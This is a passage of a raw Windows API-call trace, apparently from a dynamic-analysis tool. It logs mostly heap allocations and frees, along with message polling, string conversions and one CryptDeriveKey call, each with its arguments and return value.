[0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0140.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0140.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0140.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50ad0 [0140.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50ad0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0140.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0140.829] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa873d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0140.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0140.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0140.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0140.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0140.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0140.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0140.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0140.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0140.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0140.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0140.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0140.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0140.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0140.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0140.835] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0140.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0140.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 